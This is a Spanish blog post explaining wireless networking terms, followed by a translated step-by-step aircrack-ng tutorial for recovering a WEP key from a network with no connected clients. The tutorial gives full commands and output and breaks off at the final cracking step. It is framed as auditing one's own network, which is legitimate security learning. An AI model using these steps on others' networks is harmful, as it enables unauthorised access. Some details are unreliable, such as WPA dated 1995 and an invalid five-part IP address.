Redes Inalambricas, sacar clave wep

Cada día hay más redes inalambricas, la mayoria de redes nuevas que se instalan es de forma inalambrica y cada vez cobra mayor importante saber como funcionan para protegerse de accesos no autorizados y robos de internet de vecinos. En este post pretendo explicar un poco que son las redes inalambricas y si el tema interesa explicaré como sacar una clave WEP de una red, solo recordar que lo que aquí se explica es para aprender a auditar y proteger tu wifi, entrar en una red ajena es ilegal y si lo haces es exclusivamente bajo tu responsabilidad. Empezaré explicando unos conceptos basicos para que podamos entender porque es posible romper una clave, ya que el cifrado se basa en algoritmos que aun pareciendo fuertes acaban no siendolo.
¿Qué es "WIFI"?
Wi-Fi es un sistema de envío de datos sobre redes computacionales que utiliza ondas de radio en lugar de cables, además es una marca de la Wi-Fi Alliance (anteriormente la WECA: Wireless Ethernet Compatibility Alliance), la organización comercial que adopta, prueba y certifica que los equipos cumplen los estándares 802.11.
Wi-Fi Protected Access
WEP, acrónimo de Wired Equivalent Privacy, 1999 - es el sistema de cifrado incluido en el estándar IEEE 802.11 como protocolo para redes Wireless que permite cifrar la información que se transmite. Proporciona cifrado a nivel 2. Está basado en el algoritmo de cifrado RC4, y utiliza claves de 64 bits (40 bits más 24 bits del vector de iniciación IV) o de 128 bits (104 bits más 24 bits del IV). WPA (Wi-Fi Protected Access - 1995 - Acceso Protegido Wi-Fi) es un sistema para proteger las redes inalámbricas (Wi-Fi); creado para corregir las deficiencias del sistema previo WEP (Wired Equivalent Privacy - Privacidad Equivalente a Cableado). Los investigadores han encontrado varias debilidades en el algoritmo WEP (tales como la reutilización del vector de inicialización (IV), del cual se derivan ataques estadísticos que permiten recuperar la clave WEP, entre otros). WPA implementa la mayoría del estándar IEEE 802.11i, y fue creado como una medida intermedia para ocupar el lugar de WEP mientras 802.11i era finalizado. WPA fue creado por "The Wi-Fi Alliance" (La Alianza Wi-Fi). WPA2 está basada en el nuevo estándar 802.11i. WPA, por ser una versión previa, que se podría considerar de "migración", no incluye todas las características del IEEE 802.11i, mientras que WPA2 se puede inferir que es la versión certificada del estándar 802.11i. La alianza Wi-Fi llama a la versión de clave pre-compartida WPA-Personal y WPA2-Personal y a la versión con autenticación 802.1x/EAP como WPA-Enterprise y WPA2-Enterprise. Tecnología inalámbrica-N (802.11n). Al superponer múltiples señales de radio, la tecnología MIMO (múltiples entradas, múltiples salidas) de la red inalámbrica-N multiplica la velocidad de transferencia de datos efectiva. A diferencia de las tecnologías de redes inalámbricas ordinarias que se confunden con las reflexiones de las señales, la tecnología MIMO utiliza estas reflexiones para aumentar el alcance y reducir los “puntos muertos” en el área de cobertura de la red inalámbrica. La potente señal viaja más lejos, consiguiendo conexiones inalámbricas con un alcance muy superior al de una red inalámbrica-G estándar.
¿Qué es "WIMAX"?
WiMAX son las siglas de ‘Worldwide Interoperability for Microwave Access’, y es la marca que certifica que un producto está conforme con los estándares de acceso inalámbrico ‘IEEE 802.16′. Estos estándares permitirán conexiones de velocidades similares al ADSL o al cablemódem, sin cables, y hasta una distancia de 50-60 km. Este nuevo estándar será compatible con otros anteriores, como el de Wi-Fi (IEEE 802.11). La tecnología WiMAX será la base de las Redes Metropolitanas de acceso a Internet, servirá de apoyo para facilitar las conexiones en zonas rurales, y se utilizará en el mundo empresarial para implementar las comunicaciones internas. Además, su popularización supondrá el despegue definitivo de otras tecnologías, como VoIP (llamadas de voz sobre el protocolo IP).
¿Qué es "ADSL"?
ADSL son las siglas de Asymmetric Digital Subscriber Line ("Línea de Suscripcion Digital Asimétrica"). ADSL es un tipo de línea DSL. Consiste en una transmisión de datos digitales (la transmisión es analógica) apoyada en el par simétrico de cobre que lleva la línea telefónica convencional o línea de abonado, siempre y cuando el alcance no supere los 5,5 km. medidos desde la Central Telefónica, o no haya otros servicios por el mismo cable que puedan interferir.
¿Qué es "ENRRUTADOR"?
Enrutador (en inglés: router), ruteador o encaminador es un dispositivo de hardware para interconexión de red de ordenadores que opera en la capa tres (nivel de red). Este dispositivo permite asegurar el enrutamiento de paquetes entre redes o determinar la ruta que debe tomar el paquete de datos. El modelo WRT54GL de Linksys sigue siendo el modelo de referencia a nivel mundial.
¿Qué es "TOMATO"?
Tomato es un firmware libre y de código abierto basado en Linux disponible para dispositivos con chipset Broadcom Wi-Fi y routers, incluyendo el Linksys WRT54G. El objetivo de Tomato es la estabilidad, velocidad y eficacia. Está mantenido por Jonathan Zarate, que desarrolló asímismo HyperWRT +tofu. El sitio oficial de Tomato es este. Tomato destaca por su interface web que incluye varios gráficos en tiempo real de uso de banda y de Funciones de acceso restringido QoS , Mayor capacidad para soportar multiples conexiones desde P2P y soporte para wireless a 125 High Speed Mode (comercializado por Linksys como "SpeedBooster").
¿Qué es "DD-WRT"?
DD-WRT es un firmware no-oficial para Linksys WRT54G/GS/GL y otros routers 802.11g basados en un diseño de referencia similar o igual al Broadcom. Puedes ver la compatibilidad en Dispositivos Soportados. Todos estos routers estan diseñados para utilizar linux en el firmware oficial y su código fuente esta disponible bajo licencia GPL. El firmware lo desarrolla BrainSlayer y su página web es dd-wrt.com. Las primeras versiones de DD-WRT se basaron en el firmware "Alchemy" de Sveasoft Inc, que a su vez se basa en el firmware original GPL de Linksys y en otros proyectos.
¿Qué es "BACKTRACK"?
BackTrack es una distribución GNU/Linux en formato LiveCD pensada y diseñada para la auditoría de seguridad y relacionada con la seguridad informática en general. Deriva de la unión de dos grandes distribuciones orientadas a la seguridad, el Auditor + WHAX. Incluye larga lista de herramientas de seguridad listas para usar, entre las que destacan numerosos scanners de puertos y vulnerabilidades, archivos de exploits, sniffers, herramientas de análisis forense y herramientas para la auditoría Wireless.
¿Qué es "AIRCRACK-NG"?
Aircrack-ng es una suite de software de red que consiste en un detector, sniffer de paquetes, WEP y WPA/WPA2-PSK y herramienta de análisis para redes LAN inalámbricas 802.11. Funciona con cualquier tarjeta inalámbrica cuyo controlador soporte el modo monitor y puede snifar tráfico de 802.11a, 802.11b y 802.11g.
¿Qué es "ERW"?
ERW son las siglas de Estudio de Redes Wireless, es un sofware que auna los mejores programas diseñados para la auditoria wireless basados en Windows con el cual podemos realizar el estudio de nuestras redes para prevenir posibles accesos de personas ajenas a la red. La principal caracteristica de este programa es que todo se puede realizar con simples clic de ratón muy diferente de lo que estamos acostumbrados a hacer con Linux. No quiero que este post se haga muy pesado, si el tema interesa se detallará paso por paso los programas y manera de de desencriptar una clave WEP, para que aprendais a proteger vuestra red. Lo haremos de modo muy sencillo, paso por paso, para que todos podais hacerlo, si no os apetece la conclusion es que pongais protección WPA2 y si es posible conexión por cable nada más.
---------------------------------------------------------------------------------
Parece que no interesa mucho, dejo solo un ejemplo basico para que el post no quede vacio, un ataque wep sin clientes (es un poco más avanzado pero....) Tutorial: Como crackear WEP sin clientes Version: 1.09 de 16 de junio de 2009 By: maseros Video: http://video.aircrack-ng.org/noclient/ Traducción: Revisada el 22 de Junio de 2009 Introducción Hay muchas veces que encontramos redes wireless que no tienen clientes conectados. Este tutorial describe como obtener la clave WEP cuando no hay clientes. Aunque este tema ha sido discutido muchas veces en el Foro, este tutorial está hecho con la intención de entrar en más detalles y poner algunos ejemplos. Es recomendable que cada uno experimente con su propio punto de acceso wireless, para familiarizarse con estas ideas y técnicas. Si no tienes un punto de acceso propio, recuerda que tienes que pedir permiso al propietario del router con el que quieras practicar este ataque. Antes de nada hay que darles las gracias a los Desarrolladores de la suite Aircrack-ng por crear estas herramientas tan fantásticas. Por favor, enviame cualquier sugerencia, positiva o negativa. Bien sean problemas o buenas ideas serán bienvenidas. Puntos de partida Suponemos que: ■Estás usando drivers parcheados para inyección. Puedes capturar paquetes con Wireshark para comprobar si estás inyectando. ■Estás físicamente suficientemente cerca para enviar y recibir paquetes del punto de acceso. Recuerda que recibir paquetes del punto de acceso no significa que los paquetes que transmitas sean recibidos por el AP. La fuerza de la señal de las tarjetas wireless generalmente es menor que la fuerza de la señal de los AP. Por lo tanto, es necesario estar cerca del AP, para que los paquetes que transmitimos sean recibidos por el AP. Deberías confirmar que te puedes comunicar con el AP siguiendo estas instrucciones ■No hay paquetes de datos que vienen del punto de acceso. Beacons (balizas) y otros paquetes como “management frame packets” son inútiles para nuestros propósitos en este tutorial. Una forma rápida para comprobar el tráfico es ejecutar airodump-ng y ver si hay algún paquete de datos. En el caso de tener paquetes de datos capturados del punto de acceso en otras sesiones, podríamos usarlos para generar nuevo tráfico. Esto es para usuarios avanzados y este tutorial no da instrucciones detalladas para este caso. ■El punto de acceso usa encriptación WEP abierta (open authentication). No funcionará si la autentificación es compartida (shared key authentication) (SKA). Con SKA el único método si no existen clientes es capturar el PRGA xor data con airodump-ng handshake o hacer previamente un ataque con aireplay-ng. Esto es así porque necesitas el archivo PRGA xor para hacer una falsa autenticación de forma exitosa. ■Usamos la versión 0.9 de aircrack-ng. Si usas otra versión algunos comandos puede que se tengan que escribir de forma diferente. Asegurate de que cumples todas las condiciones, sino no funcionará. En los siguientes ejemplos, tendrás que cambiar “ath0” por el nombre de la interface de tu tarjeta wireless. En los ejemplos, la opción “guión doble bssid” se muestra como ”- -bssid”. Acuérdate de borrar el espacio entre los dos guiones cuando lo utilices en la vida real. Esto tambien se aplica a ”- -ivs”. Equipo usado En este tutorial: ■Dirección MAC del PC ejecutando la suite aircrack-ng: 00:09:5B:EC:EE:F2 ■BSSID (dirección MAC del punto de acceso): 00:14:6C:7E:40:80 ■ESSID (nombre de la red Wireless): teddy ■Canal del AP: 9 ■Interface Wireless: ath0 Tienes que obtener la información equivalente de la red sobre la que quieres trabajar. Y cambiar estos valores en los siguientes ejemplos. Solución Contenidos Aquí estań los pasos que vamos a seguir: ■1 - Fijar la dirección MAC de la tarjeta wireless ■2 - Colocar la interface wireless en modo monitor y fijar el canal ■3 - Usar aireplay-ng para hacer una falsa autenticación con el punto de acceso ■4 - Usar chopchop o ataque de fragmentación para obtener PRGA ■5 - Usar packetforge-ng para crear un paquete arp usando el PRGA obtenido en el paso anterior ■6 - Iniciar airodump-ng en el canal del AP con filtro de bssid para capturar IVs ■7 - Inyectar el paquete arp creado en el paso 5 ■8 - Ejecutar aircrack-ng para obtener la clave WEP Paso 1 - Fijar la dirección MAC de la tarjeta wireless Para ser honesto, nosotros no hemos cambiado la dirección MAC de nuestra tarjeta. Esto es un recordatorio para que uses tu dirección MAC real y no una falsa. En el paso 3 es importante que la dirección MAC que se use sea la de la nuestra tarjeta, para realizar la falsa autenticación. Si quieres cambiar la dirección MAC de tu tarjeta puedes consultar este : post en inglés FAQHow do I change my card's MAC address ?. Paso 2 - Colocar la interface wireless en modo monitor y fijar el canal Escribe el siguiente comando para poner la tarjeta wireless en modo monitor en el canal 9: airmon-ng start wifi0 9 Nota: En este comando usamos “wifi0” en lugar de nuestra interface “ath0”. Esto se debe a que estamos usando los drivers madwifi-ng y no madwifi-old. El sistema nos responderá: Interface Chipset Driver wifi0 Atheros madwifi-ng ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)Puedes observar que “ath0” aparece colocada en modo monitor. Escribe “ifconfig ath0 up” para levantar la interface ath0 que usaremos a continuación. Para confirmar que la interface está bien configurada, escribimos “iwconfig”. El sistema nos responderá: lo no wireless extensions. eth0 no wireless extensions. wifi0 no wireless extensions. ath0 IEEE 802.11g ESSID:"" Nickname:"" Mode:Monitor Frequency:2.452 GHz Access Point: 00:09:5B:EC:EE:F2 Bit Rate:0 kb/s Tx-Power:15 dBm Sensitivity=0/3 Retry:off RTS thr:off Fragment thr:off Encryption key:off Power Management:off Link Quality=0/94 Signal level=-98 dBm Noise level=-98 dBm Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0Podemos ver que ath0 está en modo monitor, en la frecuencia 2.452GHz que corresponde al canal 9 y en “Access Point” vemos la dirección MAC de nuestra tarjeta wireless. Es importante comprobar toda esta información antes de continuar, ya que sino no funcionará. Para ver la correspondencia entre frecuencia y canal, mira: http://www.rflinx.com/help/calculations/#2.4ghz_wifi_channels selecciona la etiqueta “Wifi Channel Selection and Channel Overlap”. Así obtendrás la frecuencia para cada canal. Problemas ■Si tienes otra interface en modo monitor que no sea ath0, puedes usarla o escribir “airomon-ng stop athX” donde X es la interface que quieres parar. Usar aireplay-ng para hacer una falsa autenticación con el punto de acceso Este es un paso muy importante. Para que un punto de acceso acepte un paquete, la dirección MAC debe estar previamente asociada. Si la dirección MAC con la cual estas inyectando no etá asociada, el AP ignorará el paquete y enviará un paquete de desautentificación. En este caso, no se crearán nuevos IVs porque el AP está ignorando todos los paquetes inyectados. La falta de asociación con el punto de acceso es la razón más habitual por la cual falla la inyección. Para asociarse con un punto de acceso, usa el comando: aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0 Donde: ■-1 significa falsa autenticación (fake authentication) ■0 tiempo de reasociación en segundos ■-e teddy es el nombre de la red wireless ■-a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso ■-h 00:09:5B:EC:EE:F2 es la dirección MAC de nuestra tarjeta wireless ■ath0 es el nombre de nuestra interface Si tenemos éxito aparecerá algo como esto: 18:18:20 Sending Authentication Request 18:18:20 Authentication successful 18:18:20 Sending Association Request 18:18:20 Association successful :-)Otra variación que puede funcionar en algunos puntos de acceso: aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0Donde: ■6000 Reautenticación cada 6000 segundos. En este periodo de tiempo se siguen enviando paquetes de sigo aquí o “keep alive packets”. ■-o 1 Envia solo un tipo de paquetes de cada vez. El valor por defecto es “multiple” y esto puede confundir a algunos APs. ■-q 10 Se envian paquetes de “sigo aquí” cada 10 segundos. Si tenemos éxito aparecerá algo como esto: 18:22:32 Sending Authentication Request 18:22:32 Authentication successful 18:22:32 Sending Association Request 18:22:32 Association successful :-) 18:22:42 Sending keep-alive packet 18:22:52 Sending keep-alive packet # etc....Ahora ponemos un ejemplo de un fallo de autenticación: 8:28:02 Sending Authentication Request 18:28:02 Authentication successful 18:28:02 Sending Association Request 18:28:02 Association successful :-) 18:28:02 Got a deauthentication packet! 18:28:05 Sending Authentication Request 18:28:05 Authentication successful 18:28:05 Sending Association Request 18:28:10 Sending Authentication Request 18:28:10 Authentication successful 18:28:10 Sending Association RequestPresta atención a “Got a deauthentication packet” y los continuos intentos de asociación. No se puede pasar al siguiente paso hasta que funcione la falsa autenticación de forma correcta. Problemas ■Algunos puntos de acceso están configurados para permitir únicamente una dirección MAC para asociarse y conectarse. Si este es tu caso, no serás capaz de realizar la falsa autenticación de forma éxitosa, salvo que conozcas una de las direcciones MAC que están permitidas para poder conectarse a ese AP. Mira los problemas de filtrado MAC en este tutorial ■Si deseas confirmar que estás asociado de forma correcta puedes usar tcpdump y mirar los paquetes. Inicia una consola y escribe: tcpdump -n -e -s0 -vvv -i ath0A continuación puedes ver el mensaje de error que estamos buscando: 11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:09:5B:EC:EE:F2 SA:00:14:6c:7e:40:80 DeAuthentication: Class 3 frame received from nonassociated stationPresta atención que el punto de acceso (00:14:6c:7e:40:80) le está diciendo a la tarjeta (00:09:5B:EC:EE:F2) que no está asociada. Lo que significa que el AP no aceptará los paquetes que inyectemos. Si solo quieres seleccionar los paquetes de deautenticación con tcpdump usa: “tcpdump -n -e -s0 -vvv -i ath0 | grep DeAuth”. Puedes cambiar la palabra “DeAuth” para escoger otros paquetes que quieras buscar. Paso 4 - Usar chopchop o ataque de fragmentación para obtener PRGA El objetivo de chopchop y del ataque de fragmentación es obtener un archivo PRGA (del ingles “pseudo random generation algorithm” o algoritmo de generación seudo aleatoria). Este PRGA no es la clave WEP y no se puede usar para desencriptar paquetes. Aunque, si puede usarse para crear nuevos paquetes encriptados con la clave WEP para inyectarlos. La creación de nuevos paquetes la veremos más adelante en el tutorial. Tanto chopchop como el ataque de fragmentación pueden ser usados para obtener el archivo PRGA. El resultado es el mismo, por lo que usa el que mejor te funcione. Los pros y contras de cada ataque están descritos en la página de aircrack-ng. A continuación exponemos primero el ataque de fragmentación. Abrimos otra consola y escribimos: aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0 Donde: ■-5 significa ataque de fragmentación ■-b 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso ■-h 00:09:5B:EC:EE:F2 es la dirección MAC de nuestra tarjeta wireless y debe coincidir con la dirección MAC usada en la falsa autenticación ■ath0 es el nombre de nuestra interface La respuesta que obtendremos será: aireplay-ng -5 -b 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 ath0 Waiting for a data packet... Read 127 packets... Size: 114, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:14:6C:7E:40:80 Dest. MAC = 01:00:5E:00:00:FB Source MAC = 00:40:F4:77:E5:C9 0x0000: 0842 0000 0100 5e00 00fb 0014 6c7e 4080 .B....^.....l~@. 0x0010: 0040 f477 e5c9 6052 8c00 0000 3073 d265 .@.w..`R....0s.e 0x0020: c402 790b 2293 c7d5 89c5 4136 7283 29df ..y.".....A6r.). 0x0030: 4e9e 5e13 5f43 4ff5 1b37 3ff9 4da4 c03b N.^._CO..7?.M..; 0x0040: 8244 5882 d5cc 7a1f 2b9b 3ef0 ee0f 4fb5 .DX...z.+.>...O. 0x0050: 4563 906d 0d90 88c4 5532 a602 a8ea f8e2 Ec.m....U2...... 0x0060: c531 e214 2b28 fc19 b9a8 226d 9c71 6ab1 .1..+(...."m.qj. 0x0070: 9c9f .. Use this packet ? yCuando recibamos un paquete del punto de acceso, escribe “y” para continuar. Puede que sea necesario probar unos pocos paquetes para tener éxito. Si tenemos éxito aparecerá algo como esto: Saving chosen packet in replay_src-0203-180328.cap Data packet found! Sending fragmented packet Got RELAYED packet!! Thats our ARP packet! Trying to get 384 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Trying to get 1500 bytes of a keystream Got RELAYED packet!! Thats our ARP packet! Saving keystream in fragment-0203-180343.xor Now you can build a packet with packetforge-ng out of that 1500 bytes keystreamÉxito! El archivo “fragment-0203-180343.xor” lo podremos usar en el siguiente paso para generar un paquete arp. Si con el ataque de fragmentación no hemos tenido éxito, podemos probar la técnica chopchop. Para ello ejecuta: aireplay-ng -4 ath0 -h 00:09:5B:EC:EE:F2 Donde: ■-4 significa ataque chopchop ■-h 00:09:5B:EC:EE:F2 es la dirección MAC de nuestra tarjeta wireless y debe coincidir con la dirección MAC usada en Dla falsa autenticación ■ath0 es el nombre de nuestra interface La respuesta que obtendremos será: Read 165 packets... Size: 86, FromDS: 1, ToDS: 0 (WEP) BSSID = 00:14:6C:7E:40:80 Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:40:F4:77:E5:C9 0x0000: 0842 0000 ffff ffff ffff 0014 6c7e 4080 .B..........l~@. 0x0010: 0040 f477 e5c9 603a d600 0000 5fed a222 .@.w..`:...._.." 0x0020: e2ee aa48 8312 f59d c8c0 af5f 3dd8 a543 ...H......._=..C 0x0030: d1ca 0c9b 6aeb fad6 f394 2591 5bf4 2873 ....j.....%.[.(s 0x0040: 16d4 43fb aebb 3ea1 7101 729e 65ca 6905 ..C...>.q.r.e.i. 0x0050: cfeb 4a72 be46 ..Jr.F Use this packet ? yContesta “y” y el proceso continuará. Saving chosen packet in replay_src-0201-191639.cap Offset 85 ( 0% done) | xor = D3 | pt = 95 | 253 frames written in 760ms Offset 84 ( 1% done) | xor = EB | pt = 55 | 166 frames written in 498ms Offset 83 ( 3% done) | xor = 47 | pt = 35 | 215 frames written in 645ms Offset 82 ( 5% done) | xor = 07 | pt = 4D | 161 frames written in 483ms Offset 81 ( 7% done) | xor = EB | pt = 00 | 12 frames written in 36ms Offset 80 ( 9% done) | xor = CF | pt = 00 | 152 frames written in 456ms Offset 79 (11% done) | xor = 05 | pt = 00 | 29 frames written in 87ms Offset 78 (13% done) | xor = 69 | pt = 00 | 151 frames written in 454ms Offset 77 (15% done) | xor = CA | pt = 00 | 24 frames written in 71ms Offset 76 (17% done) | xor = 65 | pt = 00 | 129 frames written in 387ms Offset 75 (19% done) | xor = 9E | pt = 00 | 36 frames written in 108ms Offset 74 (21% done) | xor = 72 | pt = 00 | 39 frames written in 117ms Offset 73 (23% done) | xor = 01 | pt = 00 | 146 frames written in 438ms Offset 72 (25% done) | xor = 71 | pt = 00 | 83 frames written in 249ms Offset 71 (26% done) | xor = A1 | pt = 00 | 43 frames written in 129ms Offset 70 (28% done) | xor = 3E | pt = 00 | 98 frames written in 294ms Offset 69 (30% done) | xor = BB | pt = 00 | 129 frames written in 387ms Offset 68 (32% done) | xor = AE | pt = 00 | 248 frames written in 744ms Offset 67 (34% done) | xor = FB | pt = 00 | 105 frames written in 315ms Offset 66 (36% done) | xor = 43 | pt = 00 | 101 frames written in 303ms Offset 65 (38% done) | xor = D4 | pt = 00 | 158 frames written in 474ms Offset 64 (40% done) | xor = 16 | pt = 00 | 197 frames written in 591ms Offset 63 (42% done) | xor = 7F | pt = 0C | 72 frames written in 217ms Offset 62 (44% done) | xor = 1F | pt = 37 | 166 frames written in 497ms Offset 61 (46% done) | xor = 5C | pt = A8 | 119 frames written in 357ms Offset 60 (48% done) | xor = 9B | pt = C0 | 229 frames written in 687ms Offset 59 (50% done) | xor = 91 | pt = 00 | 113 frames written in 339ms Offset 58 (51% done) | xor = 25 | pt = 00 | 184 frames written in 552ms Offset 57 (53% done) | xor = 94 | pt = 00 | 33 frames written in 99ms Offset 56 (55% done) | xor = F3 | pt = 00 | 193 frames written in 579ms Offset 55 (57% done) | xor = D6 | pt = 00 | 17 frames written in 51ms Offset 54 (59% done) | xor = FA | pt = 00 | 81 frames written in 243ms Offset 53 (61% done) | xor = EA | pt = 01 | 95 frames written in 285ms Offset 52 (63% done) | xor = 5D | pt = 37 | 24 frames written in 72ms Offset 51 (65% done) | xor = 33 | pt = A8 | 20 frames written in 59ms Offset 50 (67% done) | xor = CC | pt = C0 | 97 frames written in 291ms Offset 49 (69% done) | xor = 03 | pt = C9 | 188 frames written in 566ms Offset 48 (71% done) | xor = 34 | pt = E5 | 48 frames written in 142ms Offset 47 (73% done) | xor = 34 | pt = 77 | 64 frames written in 192ms Offset 46 (75% done) | xor = 51 | pt = F4 | 253 frames written in 759ms Offset 45 (76% done) | xor = 98 | pt = 40 | 109 frames written in 327ms Offset 44 (78% done) | xor = 3D | pt = 00 | 242 frames written in 726ms Offset 43 (80% done) | xor = 5E | pt = 01 | 194 frames written in 583ms Offset 42 (82% done) | xor = AF | pt = 00 | 99 frames written in 296ms Offset 41 (84% done) | xor = C4 | pt = 04 | 164 frames written in 492ms Offset 40 (86% done) | xor = CE | pt = 06 | 69 frames written in 207ms Offset 39 (88% done) | xor = 9D | pt = 00 | 137 frames written in 411ms Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms Sent 957 packets, current guess: B9... The AP appears to drop packets shorter than 35 bytes. Enabling standard workaround: ARP header re-creation. Saving plaintext in replay_dec-0201-191706.cap Saving keystream in replay_dec-0201-191706.xor Completed in 21s (2.29 bytes/s)Fantástico! El archivo “replay_dec-0201-191706.xor” lo podremos usar en el siguiente paso para generar un paquete arp. Pequeñas ayudas ■Asegúrate de que el paquete es de 68 o más bytes porque sino no tendrás suficientes datos PRGA para generar el paquete. El PRGA capturado tiene que ser igual o mayor que la longitud del paquete que queremos generar. ■Para generar algunos paquetes para forzar el comienzo de chopchop, haz ping a una IP inexistente de tu red. Esto forzará que el AP emita un “arp broadcast” y este aparecerá en chopchop para ser usado. ■Puedes comprobar el paquete desencriptado ejecutando “tcpdump -n -vvv -e -s0 -r replay_dec-0201-191706.cap”. En nuestroejemplo: reading from file replay_dec-0201-191706.cap, link-type IEEE802_11 (802.11) 19:17:06.842866 0us DA:Broadcast BSSID:00:14:6c:7e:40:80 SA:00:40:f4:77:e5:c9 LLC, dsap SNAP (0xaa), ssap SNAP (0xaa), cmd 0×03: oui Ethernet (0×000000), ethertype ARP (0×0806): arp who-has 192.168.1.12 tell 192.168.1.1 ■Puedes reusar el paquete capturado ejecutando “aireplay-ng -4 ath0 -h 00:09:5B:EC:EE:F2 -r replay_src-0201-191639.cap”. El nombre del archivo aparece cuando se inicia chopchop. ■Si tienes un archivo de capturas de una sesión anterior, puedes usarlo con el comando “aireplay-ng -4 ath0 -h 00:09:5B:EC:EE:F2 -r captura-sesión-anterior.cap” Problemas ■Si el primer paquete que has seleccionado no funciona, prueba unos pocos más. Algunas veces hay que intentarlo varias veces para conseguir tener éxito en cualquiera de los ataques. ■El ataque chopchop no funciona en algunos puntos de acceso. Si esto ocurre, prueba el ataque de fragmentación. Y viceversa. ■Asegurate de que estás correctamente asociado al AP. Para comprobarlo sigue las instrucciones del paso 2 con tcpdump. Paso 5 - Usar packetforge-ng para crear un paquete arp En el paso anterior hemos obtenido el PRGA. No importa con que ataque hemos generado el PRGA. Este PRGA se encuentra en los archivos con extensión “xor”. Podemos entonces usar este PRGA para generar un paquete para inyectar. Generaremos un paquete arp para la inyección. El objetivo es que el punto de acceso reenvie continuamente el paquete arp inyectado. Cuando lo reenvie obtendremos un nuevo IV (vector de inicialización). Todos estos IVs los usaremos para obtener la clave WEP. Pero primero vamos a generar el paquete arp para la inyección, escribiendo: packetforge-ng -0 -a 00:14:6C:7E:40:80 -h 00:09:5B:EC:EE:F2 -k 255.255.255.255 -l 255.255.255.255.255 -y fragment-0203-180343.xor -w arp-request Donde: ■-0 significa generar un paquete arp ■-a 00:14:6C:7E:40:80 es la dirección MAC del punto de acceso ■-h 00:09:5B:EC:EE:F2 es la dirección MAC de nuestra tarjeta wireless ■-k 255.255.255.255 es la IP de destino (la mayoría de los APs responden a 255.255.255.255) ■-l 255.255.255.255.255 es la IP de origen (la mayoría de los APs responden a 255.255.255.255) ■-y fragment-0203-180343.xor es el archivo del que se leerá el PRGA ■-w arp-request es el nombre del archivo en el que se guardará el paquete arp La respuesta que obtendremos será: Wrote packet to: arp-requestPequeñas ayudas ■Despues de crear el paquete, usa tcpdump para revisarlo. Escribe tcpdump -n -vvv -e -s0 -r arp-request reading from file arp-request, link-type IEEE802_11 (802.11) 10:49:17.456350 WEP Encrypted 258us BSSID:00:14:6c:7e:40:80 SA:00:09:5b:ec:ee:f2 DA:Broadcast Data IV: 8f Pad 0 KeyID 0Como estamos probando con nuestro propio AP (si no es así NO CONTINUES!), desencriptamos el paquete y nos aseguramos de que es correcto. Este paso no es necesario, solo sirve para comprobar que hemos generado un paquete correcto. Escribimos: “airdecap-ng -e teddy -w <tu clave WEP> arp-request”. Y para ver el paquete desencriptado: “tcpdump -n -r arp-request-dec”. Deberíamos observar algo como esto: reading from file arp-request-dec, link-type EN10MB (Ethernet) 10:49:17.456350 arp who-has 255.255.255.255 tell 255.255.255.255Paso 6 - Iniciar airodump-ng Abrir otra consola para capturar los IVs generados. Y escribir: airodump-ng -c 9 –bssid 00:14:6C:7E:40:80 -w capture ath0 Donde: ■-c 9 es el canal de la red wireless ■– -bssid 00:14:6C:7E:40:80 es la dirección MAC del AP. Esto elimina el trafico de otras redes. ■– -ivs especifica que solo capturaremos IVs. Así el archivo será muy pequeño. Pero no uses esta opción si quieres utilizar “aircrack-ng -z”. ■-w capture es el nombre del archivo en el que guardaremos los IVs. ■ath0 es el nombre de nuestra interface. Paso 7 - Inyectar el paquete arp Usando la consola en la que generamos el paquete arp, escribimos: aireplay-ng -2 -r arp-request ath0 Donde: ■-2 significa que usamos el modo interactivo para seleccionar el paquete ■-r arp-request especificamos el nombre del archivo con el paquete arp ■ath0 es el nombre de nuestra interface Obtendremos la siguiente respuesta: Size: 68, FromDS: 0, ToDS: 1 (WEP) BSSID = 00:14:6C:7E:40:80 Dest. MAC = FF:FF:FF:FF:FF:FF Source MAC = 00:09:5B:EC:EE:F2 0x0000: 0841 0201 0014 6c7e 4080 0009 5bec eef2 .A....l~@...[... 0x0010: ffff ffff ffff 8001 8f00 0000 7af3 8be4 ............z... 0x0020: c587 b696 9bf0 c30d 9cd9 c871 0f5a 38c5 ...........q.Z8. 0x0030: f286 fdb3 55ee 113e da14 fb19 17cc 0b5e ....U..>.......^ 0x0040: 6ada 92f2 j... Use this packet ? y Escribimos “y” para usar este paquete. Veremos cuantos paquetes estamos inyectando y se nos recuerda que iniciemos airodump-ng si no lo hemos hecho todavía: Saving chosen packet in replay_src-0204-104917.cap You should also start airodump-ng to capture replies. End of file.Mientras este comando se está ejecutando de forma exitosa, en la ventana de airodump-ng veremos algo similar a esto: CH 9 ][ Elapsed: 16 s ][ 2007-02-04 11:04 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:14:6C:7E:40:80 47 100 179 2689 336 9 11 WEP WEP teddy BSSID STATION PWR Lost Packets Probes 00:14:6C:7E:40:80 00:09:5B:EC:EE:F2 29 0 2707 Puedes observar que solo hay un punto de acceso puesto que hemos incluido en airodump-ng el filtro para limitar la captura a un único BSSID. Tambien observa que los paquetes de la tarjeta son aproximadamente los mismos que los paquetes (data) del BSSID. Esto significa que la inyección está funcionando bien y se pierden pocos paquetesl. Tambien observa la velocidad de inyección (#/s) de 336 paquetes por segundo, lo cual es un indicador de que la inyección está funcionando muy bien. Esta es una situación “ideal” de inyección. Problemas ■Si los paquetes del BSSID (data) no aumentan asegurate de que estas todavía asociado con el punto de acceso. Para hacer esto, mira las instrucciones sobre tcpdump en el paso 2. Paso 8 - Ejecutar aircrack-ng para obtener la clave WEP Inicia otra consola y escribe: 